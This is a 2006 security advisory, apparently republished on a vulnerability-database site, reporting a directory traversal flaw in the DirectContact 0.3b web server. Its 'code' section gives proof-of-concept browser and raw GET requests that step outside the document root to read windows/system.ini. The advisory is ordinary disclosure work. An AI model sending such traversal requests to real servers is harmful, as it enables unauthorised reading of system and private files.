Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11618
HistoryFeb 28, 2006 - 12:00 a.m.

directory traversal in DirectContact 0.3b

2006-02-2800:00:00
vulners.com
16
JSON
                       Donato Ferrante

Application: DirectContact
http://reyero.info/dc/

Version: 0.3b

Bug: directory traversal

Date: 27-Feb-2006

Author: Donato Ferrante
e-mail: [email protected]
web: www.autistici.org/fdonato

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

  1. Description
  2. The bug
  3. The code
  4. The fix

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

  1. Description:

Vendor's Description:

"DirectContact turns your computer in real "friendly" HTTP server."

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

  1. The bug:

The program is unable to manage malicious patterns like …\ or …/.
So an attacker can go out the document root assigned to the webserver
and see/download all the files available on the remote system.

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

  1. The code:

To test the vulnerability:

via browser:
http://[host]:[port]/…\…\…\…\windows/system.ini

via raw request:
GET /…/…/…/…/…/…/windows/system.ini HTTP/1.1

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

  1. The fix:

Vendor has been contacted.
Bug will be fixed in the next release.

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

JSON